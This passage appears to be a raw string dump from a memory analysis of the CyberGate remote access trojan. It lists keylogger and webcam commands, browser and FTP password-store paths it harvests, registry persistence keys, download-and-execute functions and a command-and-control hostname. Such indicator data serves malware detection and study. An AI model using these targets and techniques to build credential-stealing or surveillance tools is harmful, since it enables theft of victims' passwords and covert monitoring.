re><pre>SetViewportOrgEx</pre><pre>GdiplusShutdown</pre><pre>ShellExecuteW</pre><pre>FindExecutableW</pre><pre>SHDeleteKeyW</pre><pre>URLDownloadToFileW</pre><pre>keybd_event</pre><pre>VkKeyScanW</pre><pre>UnhookWindowsHookEx</pre><pre>SetWindowsHookExW</pre><pre>SetWindowsHookExA</pre><pre>SetKeyboardState</pre><pre>MsgWaitForMultipleObjects</pre><pre>MapVirtualKeyW</pre><pre>MapVirtualKeyA</pre><pre>LoadKeyboardLayoutA</pre><pre>GetKeyboardState</pre><pre>GetKeyboardLayoutList</pre><pre>GetKeyboardLayout</pre><pre>GetKeyState</pre><pre>GetKeyNameTextA</pre><pre>ExitWindowsEx</pre><pre>EnumWindows</pre><pre>EnumThreadWindows</pre><pre>ActivateKeyboardLayout</pre><pre>GetKeyboardType</pre><pre>FtpPutFileW</pre><pre>FtpSetCurrentDirectoryW</pre><pre>InternetOpenUrlW</pre><pre>InternetOpenUrlA</pre><pre>HttpQueryInfoA</pre><pre>.idata</pre><pre>.rdata</pre><pre>P.reloc</pre><pre>P.rsrc</pre><pre>[E.MyFull</pre><pre>-!GA?EXE</pre><pre>LMsg</pre><pre>AVICAP32.DLL</pre><pre>crypt32.dll</pre><pre>gdi32.dll</pre><pre>gdiplus.dll</pre><pre>mpr.dll</pre><pre>msacm32.dll</pre><pre>powrprof.dll</pre><pre>pstorec.dll</pre><pre>URLMON.DLL</pre><pre>user32.dll</pre><pre>version.dll</pre><pre>wininet.dll</pre><pre>winmm.dll</pre><pre>wsock32.dll</pre><pre>HKEY_CLASSES_ROOT</pre><pre>HKEY_CURRENT_USER</pre><pre>HKEY_LOCAL_MACHINE</pre><pre>HKEY_USERS</pre><pre>HKEY_CURRENT_CONFIG</pre><pre>Portugal</pre><pre>Turkey</pre><pre>WEBCAM</pre><pre>*<>#%"{}|\^[]`</pre><pre>uploadandexecute</pre><pre>uploadandexecuteyes|</pre><pre>uploadandexecuteno|</pre><pre>webcam|webcamstream|</pre><pre>webcam|webcamstop|</pre><pre>webcamstart</pre><pre>[Execute]</pre><pre>KeyDelBackspace</pre><pre>CyberGateKeylogger</pre><pre>software\microsoft\windows\currentversion\uninstall\</pre><pre>Invalid Key Name</pre><pre>Invalid KeyName</pre><pre>%Username%</pre><pre>%Country%</pre><pre>Úte%</pre><pre>FirstExecution</pre><pre>keylogger|keyloggeronlinekey|</pre><pre>keylogger|keyloggerativar|T|</pre><pre>keylogger|keyloggerativar|F|</pre><pre>webcamlist|</pre><pre>webcam</pre><pre>filemanager|fmsendftpyes|</pre><pre>filemanager|fmsendftpno|</pre><pre>FIREFOX2|</pre><pre>FIREFOX8|</pre><pre>FIREFOX10|</pre><pre>FIREFOX15|</pre><pre>FIREFOX22|</pre><pre>\Opera\Opera\wand.dat</pre><pre>OPERA|</pre><pre>\Google\Chrome\User Data\Default\Login Data</pre><pre>CHROME|</pre><pre>\Google\Chrome\User Data\Default\Web Data</pre><pre>getpasswords</pre><pre>downexec</pre><pre>openweb</pre><pre>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\</pre><pre>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce\</pre><pre>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\</pre><pre>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce\</pre><pre>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\</pre><pre>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\</pre><pre>fmexecnormal</pre><pre>filemanager|fmexecnormal|</pre><pre>fmexechide</pre><pre>filemanager|fmexechide|</pre><pre>fmexecparam</pre><pre>filemanager|fmexecparam|F|</pre><pre>filemanager|fmexecparam|T|</pre><pre>fmsendftp</pre><pre>filemanager|fmsendftp|</pre><pre>listarportas</pre><pre>listarportas|listadeportasativas|</pre><pre>listarportasdns</pre><pre>listarportas|finalizarconexao|</pre><pre>finalizarprocessoportas</pre><pre>listarportas|finalizarprocessoportas|Y|</pre><pre>listarportas|finalizarprocessoportas|N|</pre><pre>tecaladoexecutar</pre><pre>webcamconfig</pre><pre>keylogger</pre><pre>keylogger|keyloggeronlinestart|</pre><pre>keylogger|keyloggeronlinestop|</pre><pre>keyloggerativar</pre><pre>keyloggerdesativar</pre><pre>keyloggerbaixar</pre><pre>keylogger|keyloggerbaixar|</pre><pre>keylogger|keyloggerbaixar|NOLOGS</pre><pre>keyloggerexcluir</pre><pre>keylogger|keyloggerexcluir|</pre><pre>keyloggeronlinestart</pre><pre>keyloggeronlinestop</pre><pre>chromepass</pre><pre>chromepass|</pre><pre>keysearch</pre><pre>keysearch|NO</pre><pre>keysearch|YES</pre><pre>sendkeyswindow</pre><pre>enviarlogskey</pre><pre>enviarlogskey|</pre><pre>rar.exe</pre><pre>rarreg.key</pre><pre>vs.vbs</pre><pre>bs.bat</pre><pre>memoryexecoperation</pre><pre>TeamViewer.exe</pre><pre>TeamViewer_Resource.dll</pre><pre>TV.dll</pre><pre>x.html</pre><pre>Windows 3.1</pre><pre>Windows 95 (Release 2)</pre><pre>Windows 95</pre><pre>Windows 98 SE</pre><pre>Windows 98</pre><pre>Windows ME</pre><pre>Windows 8</pre><pre>Windows 7</pre><pre>Windows Vista</pre><pre>Windows XP Professional x64</pre><pre>Windows XP Home</pre><pre>Windows XP Professional</pre><pre>Windows 2000 Professional</pre><pre>Windows 2008</pre><pre>Windows 2003 Server Datacenter</pre><pre>Windows 2003 Server Enterprise</pre><pre>Windows 2003 Server Web Edition</pre><pre>Windows 2003 Server</pre><pre>Windows Home Server</pre><pre>Windows 2003 Server (Release 2)</pre><pre>Windows 2000 Server Datacenter</pre><pre>Windows 2000 Server Enterprise</pre><pre>Windows 2000 Server Web Edition</pre><pre>Windows 2000 Server</pre><pre>Windows NT 4.0 Server Datacenter</pre><pre>Windows NT 4.0 Server Enterprise</pre><pre>Windows NT 4.0 Server Web Edition</pre><pre>Windows NT 4.0 Server</pre><pre>SelfDelete.bat</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>Software\Microsoft\Windows\CurrentVersion\RunOnce</pre><pre>Software\Microsoft\Windows NT\CurrentVersion\Windows</pre><pre>SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run</pre><pre>explorer.exe</pre><pre>\Microsoft\Windows\</pre><pre>CYBERGATEPASS</pre><pre>lala25.no-ip.biz</pre><pre>C:\User</pre><pre>InstallDir.exe</pre><pre>ÞFAULTBROWSER%</pre><pre>2.5.2.0</pre><pre>ftp.ftpserver.com</pre><pre>ftpuser</pre><pre>ftppass</pre><pre>Then set URL here.</pre><pre>calc.exe</pre><pre>notepad.exe</pre><pre>lsass.exe</pre><pre>explorer.exe</pre><pre>svchost.exe</pre><pre>http://www.somehosting.com/tagger.php</pre><pre>::{21EC2020-3AEA-1069-A2DD-08002B30309D}\::{2227A280-3AEA-1069-A2DE-08002B30309D}</pre><pre>::{031E4825-7B94-4dc3-B131-E946B44C8DD5}\{491E922F-5643-4af4-A7EB-4E7A138D8174}</pre><pre>::{59031a4?id=%ID%&name=%Username% @ %PCName%&version=%Version%</pre><pre>example@email.com</pre><pre>No help keyword specified.</pre><pre>No help found for %s#No context-sensitive help installed$No topic-based help system installed</pre><pre>Alt Clipboard does not support Icons/Menu '%s' is already being used by another form</pre><pre>Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window</pre><pre>OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters</pre><pre>Unsupported clipboard format</pre><pre>Transparent proxy cannot bind. UDP Not supported by this proxy.$Buffer terminator must be specified.!Buffer start position is invalid.</pre><pre>Reply Code is not valid: %s</pre><pre>Reply Code already exists: %s Thread must be specified for the scheduler.!You must have an OnExecute event.</pre><pre>Command not supported.</pre><pre>Address type not supported."%d: Circular links are not allowed"Not enough data in buffer. (%d/%d)</pre><pre>File "%s" not found</pre><pre>Object type not supported.</pre><pre>%s is not a valid IPv6 address:The requested IPVersion / Address family is not supported.</pre><pre>Set Size Exceeded.)UDP is not support in this SOCKS version.</pre><pre>Request rejected or failed.5Request rejected because SOCKS server cannot connect.QRequest rejected because the client program and identd report different user-ids.</pre><pre>Stack already created.1Only one TIdAntiFreeze can exist per application.&Cannot change IPVersion when connected$Can not bind in port range (%d - %d)</pre><pre>Connection Closed Gracefully.;Could not bind socket. Address and port are already in use.</pre><pre>Invalid Port Range (%d - %d)</pre><pre>%s is not a valid service.</pre><pre>"Operation not supported on socket.</pre><pre>Protocol family not supported.0Address family not supported by protocol family.</pre><pre>Socket is not connected..Cannot send or receive after socket is closed.#Too many references, cannot splice.</pre><pre>Operation would block.</pre><pre>Operation now in progress.</pre><pre>Operation already in progress.</pre><pre>Socket operation on non-socket.</pre><pre>Protocol not supported.</pre><pre>Socket type not supported.</pre><pre>Invalid destination array"Character index out of bounds (%d)</pre><pre>Start index out of bounds (%d)</pre><pre>Invalid count (%d)</pre><pre>Invalid destination index (%d)</pre><pre>Invalid codepage (%d)-Error on call to Winsock2 library function %s&Error on loading Winsock2 library (%s)</pre><pre>Resolving hostname %s.</pre><pre>Connecting to %s.</pre><pre>Socket Error # %d</pre><pre>List capacity out of bounds (%d)</pre><pre>List count out of bounds (%d)</pre><pre>List index out of bounds (%d) Out of memory while expanding memory stream</pre><pre>Error reading %s%s%s: %s</pre><pre>Failed to get data for '%s'</pre><pre>Resource %s not found</pre><pre>%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group</pre><pre>Property %s does not exist</pre><pre>Thread creation error: %s</pre><pre>Thread Error: %s (%d)</pre><pre>Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread</pre><pre>Class %s not found</pre><pre>A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates</pre><pre>Cannot create file "%s". %s</pre><pre>Cannot open file "%s". %s</pre><pre>Invalid stream format$''%s'' is not a valid component name</pre><pre>Invalid data type for '%s'</pre><pre>Ancestor for '%s' not found</pre><pre>Cannot assign a %s to a %s</pre><pre>Interface not supported</pre><pre>%s (%s, line %d)</pre><pre>Abstract Error?Access violation at address %p in module '%s'. %s of address %p</pre><pre>System Error. Code: %d.</pre><pre>Invalid variant operation%Invalid variant operation (%s%.8x)</pre><pre>%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)</pre><pre>Operation not supported</pre><pre>External exception %x</pre><pre>Invalid pointer operation</pre><pre>Invalid class typecast0Access violation at address %p. %s of address %p</pre><pre>Operation aborted(Exception %s in module %s at %p.</pre><pre>Application Error1Format '%s' invalid or incompatible with argument</pre><pre>No argument for format '%s'"Variant method calls not supported</pre><pre>!'%s' is not a valid integer value('%s' is not a valid floating point value</pre><pre>I/O error %d</pre><pre>Integer overflow Invalid floating point operation</pre><b>iexplore.exe_3128_rwx_01611000_0010D000:</b><pre>kernel32.dll</pre><pre>Windows</pre><pre>MSWHEEL_ROLLMSG</pre><pre>MSH_WHEELSUPPORT_MSG</pre><pre>MSH_SCROLL_LINES_MSG</pre><pre>$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)</pre><pre>oleaut32.dll</pre><pre>EVariantBadIndexError</pre><pre>ssShift</pre><pre>htKeyword</pre><pre>EInvalidOperation</pre><pre>u%CNu</pre><pre>%s[%d]</pre><pre>%s_%d</pre><pre>EIdCanNotBindPortInRange</pre><pre>EIdInvalidPortRange\wc</pre><pre>Z:\Projects\CyberGate Excel\Workplace\beta 2.5.2.0\Server\Indy10\System\IdStreamVCL.pas</pre><pre>Z:\Projects\CyberGate Excel\Workplace\beta 2.5.2.0\Server\Indy10\System\IdGlobal.pas</pre><pre>WS2_32.DLL</pre><pre>MSWSOCK.DLL</pre><pre>getservbyport</pre><pre>WSAAsyncGetServByPort</pre><pre>WSAJoinLeaf</pre><pre>WSARecvMsg</pre><pre>WSASendMsg</pre><pre>Wship6.dll</pre><pre>Fwpuclnt.dll</pre><pre>TIdSocketListWindows</pre><pre>TIdStackWindowsU</pre><pre>Kernel32.dll</pre><pre>EIdIPVersionUnsupportedP</pre><pre>127.0.0.1</pre><pre>Z:\Projects\CyberGate Excel\Workplace\beta 2.5.2.0\Server\Indy10\System\IdStack.pas</pre><pre>EIdPortRequired</pre><pre>EIdTCPConnectionError</pre><pre>EIdObjectTypeNotSupported</pre><pre>ftpTransfer</pre><pre>ftpReady</pre><pre>ftpAborted</pre><pre>PortT</pre><pre>Z:\Projects\CyberGate Excel\Workplace\beta 2.5.2.0\Server\Indy10\Core\IdIOHandler.pas</pre><pre>ClientPortMin</pre><pre>ClientPortMax</pre><pre>Port|</pre><pre>"EIdTransparentProxyUDPNotSupported</pre><pre>Z:\Projects\CyberGate Excel\Workplace\beta 2.5.2.0\Server\Indy10\Core\IdIOHandlerStack.pas</pre><pre>%EIdSocksUDPNotSupportedBySOCKSVersion</pre><pre>saUsernamePassword</pre><pre>Password</pre><pre>PortD</pre><pre>0.0.0.1</pre><pre>0.0.0.0</pre><pre>BoundPort</pre><pre>DefaultPortD</pre><pre>TIdTCPConnection</pre><pre>TIdTCPConnectionX</pre><pre>IdTCPConnection</pre><pre>TIdTCPClientCustom</pre><pre>IdTCPClient</pre><pre>TIdTCPClient</pre><pre>TIdTCPClientH</pre><pre>BoundPortT</pre><pre>ole32.dll</pre><pre>EInvalidGraphicOperation</pre><pre>Please contact Cyber-Software support</pre><pre>shlwapi.dll</pre><pre>WbemScripting.SWbemLocator</pre><pre>%s\%s</pre><pre>SELECT * FROM %s</pre><pre>pathToSignedProductExe</pre><pre>pathToSignedReportingExe</pre><pre>USER32.DLL</pre><pre>comctl32.dll</pre><pre>uxtheme.dll</pre><pre>MAPI32.DLL</pre><pre>IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")</pre><pre>JumpID("","%s")</pre><pre>TKeyEvent</pre><pre>TKeyPressEvent</pre><pre>HelpKeyword</pre><pre>crSQLWait</pre><pre>%s (%s)</pre><pre>imm32.dll</pre><pre>AutoHotkeys</pre><pre>ssHotTrack</pre><pre>TWindowState</pre><pre>poProportional</pre><pre>TWMKey</pre><pre>KeyPreview</pre><pre>WindowState</pre><pre>OnKeyDown46g</pre><pre>OnKeyPress</pre><pre>OnKeyUp</pre><pre>System\CurrentControlSet\Control\Keyboard Layouts\%.8x</pre><pre>vcltest3.dll</pre><pre>User32.dll</pre><pre>TWebcam</pre><pre>SetupApi.dll</pre><pre>SetupDiOpenClassRegKey</pre><pre>SetupDiOpenClassRegKeyExA</pre><pre>SetupDiOpenClassRegKeyExW</pre><pre>SetupDiCreateDeviceInterfaceRegKeyA</pre><pre>SetupDiCreateDeviceInterfaceRegKeyW</pre><pre>SetupDiOpenDeviceInterfaceRegKey</pre><pre>SetupDiDeleteDeviceInterfaceRegKey</pre><pre>SetupDiCreateDevRegKeyA</pre><pre>SetupDiCreateDevRegKeyW</pre><pre>SetupDiOpenDevRegKey</pre><pre>SetupDiDeleteDevRegKey</pre><pre>CM_DEVCAP_LOCKSUPPORTED</pre><pre>CM_DEVCAP_EJECTSUPPORTED</pre><pre>PDCAP_D0_SUPPORTED</pre><pre>PDCAP_D1_SUPPORTED</pre><pre>PDCAP_D2_SUPPORTED</pre><pre>PDCAP_D3_SUPPORTED</pre><pre>PDCAP_WAKE_FROM_D0_SUPPORTED</pre><pre>PDCAP_WAKE_FROM_D1_SUPPORTED</pre><pre>PDCAP_WAKE_FROM_D2_SUPPORTED</pre><pre>PDCAP_WAKE_FROM_D3_SUPPORTED</pre><pre>PDCAP_WARM_EJECT_SUPPORTED</pre><pre>ISO_646.irv:1991</pre><pre>ISO_646.basic:1983</pre><pre>ISO_646.irv:1983</pre><pre>csISO16Portuguese</pre><pre>csISO84Portuguese2</pre><pre>windows-936</pre><pre>csShiftJIS</pre><pre>windows-874</pre><pre>ISO-8859-1-Windows-3.0-Latin-1</pre><pre>csWindows30Latin1</pre><pre>ISO-8859-1-Windows-3.1-Latin-1</pre><pre>csWindows31Latin1</pre><pre>ISO-8859-2-Windows-Latin-2</pre><pre>csWindows31Latin2</pre><pre>ISO-8859-9-Windows-Latin-5</pre><pre>csWindows31Latin5</pre><pre>csMicrosoftPublishing</pre><pre>Windows-31J</pre><pre>csWindows31J</pre><pre>PTCP154</pre><pre>csPTCP154</pre><pre>windows-1250</pre><pre>windows-1251</pre><pre>windows-1252</pre><pre>windows-1253</pre><pre>windows-1254</pre><pre>windows-1255</pre><pre>windows-1256</pre><pre>windows-1257</pre><pre>windows-1258</pre><pre>HTTP-EQUIV</pre><pre>()<>@,;:\"./</pre><pre>()<>@,;:\"/[]?=</pre><pre>()<>@,;:\"/[]?={}</pre><pre>Z:\Projects\CyberGate Excel\Workplace\beta 2.5.2.0\Server\Indy10\Core\IdThread.pas</pre><pre>Z:\Projects\CyberGate Excel\Workplace\beta 2.5.2.0\Server\Indy10\Core\IdScheduler.pas</pre><pre>Z:\Projects\CyberGate Excel\Workplace\beta 2.5.2.0\Server\Indy10\Core\IdServerIOHandlerSocket.pas</pre><pre>EIdTCPNoOnExecute</pre><pre>TIdTCPServer</pre><pre>TIdTCPServerX</pre><pre>IdTCPServer</pre><pre>OnExecute</pre><pre>Z:\Projects\CyberGate Excel\Workplace\beta 2.5.2.0\Server\Indy10\Core\IdSchedulerOfThread.pas</pre><pre>%s User</pre><pre>IdCustomTCPServer</pre><pre>TIdCustomTCPServer</pre><pre>DefaultPort</pre><pre>EIdTCPServerError</pre><pre>Z:\Projects\CyberGate Excel\Workplace\beta 2.5.2.0\Server\Indy10\Core\IdCustomTCPServer.pas</pre><pre>CmdDelimiter</pre><pre>Z:\Projects\CyberGate Excel\Workplace\beta 2.5.2.0\Server\Indy10\Core\IdCommandHandlers.pas</pre><pre>'TIdCmdTCPServerAfterCommandHandlerEvent</pre><pre>TIdCmdTCPServer</pre><pre>(TIdCmdTCPServerBeforeCommandHandlerEvent</pre><pre>IdCmdTCPServer</pre><pre>Displays commands that the servers supports.</pre><pre>TIdTCPStream</pre><pre>IdRead() method of TIdTCPStream class does not support seeking</pre><pre>TIdHTTPProxyTransferMode</pre><pre>TIdHTTPProxyServerContextt</pre><pre>TIdHTTPProxyServerContext$</pre><pre>TOnHTTPContextEvent</pre><pre>TIdHTTPProxyServerContext</pre><pre>TOnHTTPDocument</pre><pre>TIdHTTPProxyServer</pre><pre>OnHTTPBeforeCommand</pre><pre>OnHTTPResponse</pre><pre>OnHTTPDocument</pre><pre>HTTP/1.0</pre><pre>HTTP/1.0 200 Connection established</pre><pre>HNetCfg.FwMgr</pre><pre>HNetCfg.FwAuthorizedApplication</pre><pre>PSAPI.dll</pre><pre>TWebcamThread</pre><pre>Uh.Uk</pre><pre>789:;<&'()* ,-./12345</pre><pre>iphlpapi.dll</pre><pre>AllocateAndGetTcpExTableFromStack</pre><pre>AllocateAndGetUdpExTableFromStack</pre><pre>SetTcpEntry</pre><pre>GetExtendedTcpTable</pre><pre>GetExtendedUdpTable</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\</pre><pre>TSendKey</pre><pre>sqlite3_bind_blob</pre><pre>sqlite3_bind_text</pre><pre>sqlite3_bind_double</pre><pre>sqlite3_bind_int</pre><pre>sqlite3_bind_int64</pre><pre>sqlite3_bind_null</pre><pre>sqlite3_bind_parameter_index</pre><pre>sqlite3_open</pre><pre>sqlite3_close</pre><pre>sqlite3_errmsg</pre><pre>sqlite3_free</pre><pre>sqlite3_prepare_v2</pre><pre>sqlite3_column_count</pre><pre>sqlite3_column_name</pre><pre>sqlite3_column_decltype</pre><pre>sqlite3_step</pre><pre>sqlite3_column_blob</pre><pre>sqlite3_column_bytes</pre><pre>sqlite3_column_double</pre><pre>sqlite3_column_text</pre><pre>sqlite3_column_type</pre><pre>sqlite3_column_int64</pre><pre>sqlite3_finalize</pre><pre>sqlite3_reset</pre><pre>ESQLiteException</pre><pre>TSQLiteDatabaseD</pre><pre>TSQLiteTable</pre><pre>Failed to open database "%s" : %s</pre><pre>Failed to open database "%s" : unknown error</pre><pre>Error executing SQL</pre><pre>Could not prepare SQL statement</pre><pre>Error executing SQL statement</pre><pre>SQLite is Busy</pre><pre>SOFTWARE\Mozilla\Mozilla Firefox</pre><pre>SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox</pre><pre>SOFTWARE\Mozilla\Mozilla Firefox\</pre><pre>SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\</pre><pre>1234567890.</pre><pre>mozsqlite3.dll</pre><pre>sqlite3.dll</pre><pre>mozcrt19.dll</pre><pre>msvcr100.dll</pre><pre>mozglue.dll</pre><pre>mozutils.dll</pre><pre>nspr4.dll</pre><pre>plc4.dll</pre><pre>plds4.dll</pre><pre>nssutil3.dll</pre><pre>nss3.dll</pre><pre>PK11_GetInternalKeySlot</pre><pre>\Mozilla\Firefox\profiles.ini</pre><pre>\Mozilla\Firefox\</pre><pre>signons.sqlite</pre><pre>SELECT * FROM moz_logins</pre><pre>encryptedPassword</pre><pre>Microsoft\Network\Connections\pbk\rasphone.pbk</pre><pre>rasapi32.dll</pre><pre>rnaph.dll</pre><pre>RAS Passwords</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion</pre><pre>Ps_Passwords</pre><pre>advapi32.dll</pre><pre>WindowsLive:name=*</pre><pre>\Mozilla Firefox\</pre><pre>MSVCR100.dll</pre><pre>softokn3.dll</pre><pre>userenv.dll</pre><pre>profiles.ini</pre><pre>\signons3.txt</pre><pre>\signons2.txt</pre><pre>\signons1.txt</pre><pre>\signons.txt</pre><pre>ps_SafariPasswordRecovery</pre><pre>AVURLProtocol_Classic</pre><pre>\Apple Computer\Preferences\keychain.plist</pre><pre>\Apple\Apple Application Support\CFNetwork.dll</pre><pre>http://</pre><pre>ftp://</pre><pre>*ftp://</pre><pre>https://</pre><pre>Shell.Application</pre><pre>http://cyber-sec.org/email/asp/email.php?email=</pre><pre>TMemoryOperation</pre><pre>%sysdir%\</pre><pre>%serverpath%\</pre><pre>%sysdir%</pre><pre>%serverpath%</pre><pre>Proxy Bypass</pre><pre>ntdll.dll</pre><pre>TPasswordItem</pre><pre>TArrayPasswod</pre><pre>Crypt32.dll</pre><pre>shell32.dll</pre><pre>Advapi32.dll</pre><pre>SOFTWARE\MOZILLA\MOZILLA FIREFOX</pre><pre>SOFTWARE\MOZILLA\MOZILLA FIREFOX\version.dll\Main</pre><pre>select * from moz_logins</pre><pre>Firefox</pre><pre>SOFTWARE\MOZILLA\MOZILLA FIREFOX\</pre><pre>\Flock\Browser\profiles.ini</pre><pre>Flock-Firefox</pre><pre>\1-abc\personal calendar\sqlite3.dll</pre><pre>\clipdiary\sqlite3.dll</pre><pre>\conceptworld\recentx\sqlite3.dll</pre><pre>\darq software\transmute\sqlite3.dll</pre><pre>\delphish\sqlite3.dll</pre><pre>\ditto\sqlite3.dll</pre><pre>\du meter\sqlite3.dll</pre><pre>\fcleaner\sqlite3.dll</pre><pre>\file seeker\sqlite3.dll</pre><pre>\flashnote\sqlite3.dll</pre><pre>\flashpaste\sqlite3.dll</pre><pre>\gorecord\sqlite3.dll</pre><pre>\gorecord2\sqlite3.dll</pre><pre>\linkcollector portable\sqlite3.dll</pre><pre>\ma-config.com\sqlite3.dll</pre><pre>\macrovirus\sqlite3.dll</pre><pre>\msnsniffer2\sqlite3.dll</pre><pre>\notecable\sqlite3.dll</pre><pre>\nzbleecher\sqlite3.dll</pre><pre>\outlook express\sqlite3.dll</pre><pre>\page update watcher\sqlite3.dll</pre><pre>\pipi\sqlite3.dll</pre><pre>\qloud\sqlite3.dll</pre><pre>\qloud\winamp\sqlite3.dll</pre><pre>\qloud\windows media player\sqlite3.dll</pre><pre>\recordtheradio\sqlite3.dll</pre><pre>\rightload\sqlite3.dll</pre><pre>\smm\funny sms10\sqlite3.dll</pre><pre>\smm\simple mail 7\sqlite3.dll</pre><pre>\spiceworks\bin\sqlite3.dll</pre><pre>\spyware-secure\sqlite3.dll</pre><pre>\timelog\sqlite3.dll</pre><pre>\video2webcam\sqlite3.dll</pre><pre>\webmarkers\sqlite3.dll</pre><pre>\webmediaplayer\sqlite3.dll</pre><pre>\windows media player\plugins\qloud\sqlite3.dll</pre><pre>\Mozilla Firefox\sqlite3.dll</pre><pre>\VirusGuardPlus\sqlite3.dll</pre><pre>\Safari\sqlite3.dll</pre><pre>\AIMP2\sqlite3.dll</pre><pre>\Live-Player\sqlite3.dll</pre><pre>\TrustedProtection\sqlite3.dll</pre><pre>\PCTotalDefender\sqlite3.dll</pre><pre>\Common Files\eEye Digital Security\Application Bus\sqlite3.dll</pre><pre>Windows Live Messenger</pre><pre>DynDNS\Updater\config.dyndns</pre><pre>Password=</pre><pre>Software\DownloadManager\Passwords</pre><pre>Software\DownloadManager\Passwords\</pre><pre>EncPassword</pre><pre>YLoginWnd</pre><pre><Port></Port></pre><pre><Pass></Pass></pre><pre>FileZilla\recentservers.xml</pre><pre>FileZilla\sitemanager.xml</pre><pre>FileZilla\filezilla.xml</pre><pre><password></password></pre><pre>.purple\accounts.xml</pre><pre>abe2869f-9b47-4cd9-a358-c22904dba7f7</pre><pre>trillian.ini</pre><pre>accounts.ini</pre><pre>password</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Trillian</pre><pre>Trillian\trillian.exe</pre><pre>Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook</pre><pre>Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\</pre><pre>###@@@!!!</pre><pre>IMAP Password</pre><pre>IMAP Password:</pre><pre>POP3 Password</pre><pre>POP3 Password:</pre><pre>HNetCfg.NATUPnP</pre><pre>StaticPortMappingCollection</pre><pre>Uh%Fm</pre><pre>TCpuUsageU</pre><pre>##,##0.00</pre><pre>TNewFTPThreadU</pre><pre>TPasswordU</pre><pre>SHFileOperationW</pre><pre>.hd'n</pre><pre>.hd*n</pre><pre>%s %s</pre><pre>Windows NT %d.%d</pre><pre>%s %s Server</pre><pre>Unknown Platform ID (%d)</pre><pre>%d.%d</pre><pre>%s [Build: %d</pre><pre>- Service Pack: %s</pre><pre>KERNEL32.DLL</pre><pre>TIdTCPClientNewp</pre><pre>TIdTCPClientNew</pre><pre>1.2.3</pre><pre>deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly</pre><pre>inflate 1.2.3 Copyright 1995-2005 Mark Adler</pre><pre>?456789:;<=</pre><pre>!"#$%&'()* ,-./0123</pre><pre>com.apple.Safari</pre><pre>com.apple.Safari0123456789ABCDEF</pre><pre>333333333333333333</pre><pre>33333833</pre><pre>3333339</pre><pre>3333333333333338</pre><pre>:*"*"$3338</pre><pre>3333333</pre><pre>33333333</pre><pre>33333333333</pre><pre>3333333333338</pre><pre>33338?383</pre><pre>333333333333</pre><pre>:*3:"$3338</pre><pre>333333333333333</pre><pre>KWindows</pre><pre>IdStackWindows</pre><pre>Sr_StartWebcam</pre><pre>UrlMon</pre><pre>UnitWebcamAPI</pre><pre>IdTCPStream</pre><pre> IdTCPServer</pre><pre>Sr_Windows</pre><pre>Cm_Keylogger</pre><pre>~Sr_Ports</pre><pre>}Unitsndkey32</pre><pre>Vps_FireFox3_5</pre><pre>SQLiteTable3</pre><pre>SQLite3</pre><pre>Ps_IEpasswords</pre><pre>ps_URLHistory</pre><pre>FPs_PasswordRecovery</pre><pre>Ps_OperaPasswords</pre><pre>Sr_MemoryEXE</pre><pre>Sr_MemoryExecuteFunctions</pre><pre>U_GrabFirefox10</pre><pre>YU_GrabFirefox8</pre><pre>6U_GrabFirefox</pre><pre>\U_GrabChrome</pre><pre>U_GrabFirefox15</pre><pre>U_Grabfirefox22</pre><pre>{IdCmdTCPClient</pre><pre>SetNamedPipeHandleState</pre><pre>GetWindowsDirectoryW</pre><pre>GetProcessHeap</pre><pre>GetCPInfo</pre><pre>CreatePipe</pre><pre>RegQueryInfoKeyA</pre><pre>RegOpenKeyExW</pre><pre>RegOpenKeyExA</pre><pre>RegOpenKeyW</pre><pre>RegOpenKeyA</pre><pre>RegFlushKey</pre><pre>RegEnumKeyExW</pre><pre>RegEnumKeyExA</pre><pre>RegDeleteKeyW</pre><pre>RegCreateKeyExW</pre><pre>RegCreateKeyExA</pre><pre>RegCreateKeyW</pre><pre>RegCloseKey</pre><pre>CryptImportKey</pre><pre>CryptSetKeyParam</pre><pre>CryptDestroyKey</pre><pre>SetViewportOrgEx</pre><pre>GdiplusShutdown</pre><pre>ShellExecuteW</pre><pre>FindExecutableW</pre><pre>SHDeleteKeyW</pre><pre>URLDownloadToFileW</pre><pre>keybd_event</pre><pre>VkKeyScanW</pre><pre>UnhookWindowsHookEx</pre><pre>SetWindowsHookExW</pre><pre>SetWindowsHookExA</pre><pre>SetKeyboardState</pre><pre>MsgWaitForMultipleObjects</pre><pre>MapVirtualKeyW</pre><pre>MapVirtualKeyA</pre><pre>LoadKeyboardLayoutA</pre><pre>GetKeyboardState</pre><pre>GetKeyboardLayoutList</pre><pre>GetKeyboardLayout</pre><pre>GetKeyState</pre><pre>GetKeyNameTextA</pre><pre>ExitWindowsEx</pre><pre>EnumWindows</pre><pre>EnumThreadWindows</pre><pre>ActivateKeyboardLayout</pre><pre>GetKeyboardType</pre><pre>FtpPutFileW</pre><pre>FtpSetCurrentD